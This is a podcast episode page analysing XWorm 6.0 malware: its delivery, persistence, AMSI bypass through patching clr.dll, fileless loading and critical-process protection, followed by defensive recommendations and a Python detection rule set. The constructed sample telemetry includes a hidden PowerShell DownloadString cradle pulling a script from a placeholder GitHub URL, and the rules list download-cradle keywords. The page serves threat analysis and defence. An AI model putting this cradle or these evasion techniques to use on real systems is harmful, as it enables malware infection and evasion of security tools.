Content provided by Meni Tasa. All podcast content including episodes, graphics, and podcast descriptions are uploaded and provided directly by Meni Tasa or their podcast platform partner. If you believe someone is using your copyrighted work without your permission, you can follow the process outlined here https://podcastplayer.com/legal.
The Malware That Fights Back

6:25
Episode Description

XWorm 6.0 adds a hostile twist to persistence. Delivered via obfuscated VBScript, it bypasses AMSI, runs entirely in memory, and marks itself as a “critical process” that crashes your PC if you try to kill it. In this episode, we walk through the attack from delivery to defense — and why it works so well.

Technical Write-Up

Initial Access: Delivered via obfuscated VBScript, likely through social engineering. Payload concealed as reversed numeric character codes, reconstructed at runtime.

Execution: Removes Zone.Identifier ADS, launches PowerShell to download a secondary script into the TEMP folder.

Persistence: Copies itself as update.vbs into TEMP and APPDATA and adds both copies to the Windows Run registry key. The builder also supports scheduled task or startup folder persistence.

AMSI Bypass: Patches clr.dll in memory, replacing “AmsiScanBuffer” with null bytes to disable AMSI memory inspection.

Payload Delivery: Downloads the XWorm binary from a public GitHub repository via the .NET HTTP client, then loads it into memory with Assembly.Load for fileless execution.

Privilege Escalation & Process Protection: With admin rights, enables SeDebugPrivilege and marks itself as a “critical process,” causing a system crash if terminated.

Anti-Analysis: Terminates on Windows XP, or if an IP-API lookup shows the host sits in a hosting or data center IP range.

Defensive Recommendations:

  • Monitor for unusual VBScript execution, especially from email or downloads.
  • Detect PowerShell downloading scripts from public repositories.
  • Alert on in-memory modifications to clr.dll.
  • Investigate registry Run keys pointing to TEMP or APPDATA.
  • Watch for processes setting themselves as “critical.”
  • Track outbound requests to IP-API or similar services.
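Added example, not from the episode or the Netskope IOC repository: a small rule set that maps the six recommendations above to checks over constructed EDR-style telemetry. Event shapes, field names, the watched API names and the sample paths/URLs are assumptions made for this example.

```python
import re
# Rule inputs are assumptions for this example, not values from the episode or the IOC repo.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
USER_DIRS = re.compile(r"\\(Temp|AppData\\Roaming)\\", re.I)
PUBLIC_REPOS = ("github.com", "raw.githubusercontent.com")
CRADLES = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ")
CRITICAL_APIS = ("RtlSetProcessIsCritical", "NtSetInformationProcess")  # assumed telemetry names

def check_event(ev):
    """Return the names of the recommendations a single telemetry event matches."""
    hits, kind = [], ev["type"]
    img, cmd, parent = (ev.get(k, "").lower() for k in ("image", "cmdline", "parent"))
    if kind == "process":
        # 1. script host spawned by a mail client or browser, or running a script from Downloads
        if img.endswith(("wscript.exe", "cscript.exe")) and (
                parent.endswith(("outlook.exe", "chrome.exe", "msedge.exe")) or "\\downloads\\" in cmd):
            hits.append("vbscript_from_mail_or_download")
        # 2. PowerShell pulling a script from a public repository
        if "powershell" in img and any(r in cmd for r in PUBLIC_REPOS) and any(c in cmd for c in CRADLES):
            hits.append("powershell_download_public_repo")
    elif kind == "memory_write" and ev.get("target_module", "").lower().endswith("clr.dll"):
        hits.append("clr_dll_patched_in_memory")        # 3. write into the mapped clr.dll image
    elif kind == "registry" and RUN_KEY.search(ev.get("key", "")) and USER_DIRS.search(ev.get("value", "")):
        hits.append("run_key_to_temp_or_appdata")       # 4. Run key value under TEMP or APPDATA
    elif kind == "api_call" and ev.get("function") in CRITICAL_APIS:
        hits.append("process_marked_critical")          # 5. process marking itself critical
    elif kind == "network" and ev.get("dest_host", "").lower() == "ip-api.com":
        hits.append("ip_api_lookup")                    # 6. outbound IP-API geolocation lookup
    return hits

def scan(events):
    """Map each event index to its matched rules, skipping clean events."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}

# Constructed sample telemetry modelled on the chain described above (placeholder paths/URLs).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\invoice.vbs"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell -w hidden (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EXAMPLE/s.ps1')"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\update",
     "value": r"C:\Users\u\AppData\Roaming\update.vbs"},
    {"type": "memory_write", "target_module": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    {"type": "api_call", "function": "RtlSetProcessIsCritical"},
    {"type": "network", "dest_host": "ip-api.com"},
    {"type": "process", "image": r"C:\Windows\explorer.exe", "parent": "", "cmdline": "explorer.exe"},
]
```

Each rule fires on its own event, so a single hit is a lead to investigate; the sequence across all six within one host session is the pattern worth alerting on.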

Indicators of Compromise (IOCs) & Scripts:
All the IOCs and scripts related to this malware are available in the Netskope Threat Labs GitHub repository:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Malware/XWorm/IOCs/2025-07-25

Support the show

Thanks for spending a few minutes on the CyberBrief Project.

If you want to dive deeper or catch up on past episodes, head over to cyberbriefproject.buzzsprout.com.

You can also find the podcast on YouTube at youtube.com/@CyberBriefProject. I’d love to see you there.

And if you find these episodes valuable and want to support the project, you can do that here: buzzsprout.com/support

Your support means a lot.

See you in the next one, and thank you for listening.
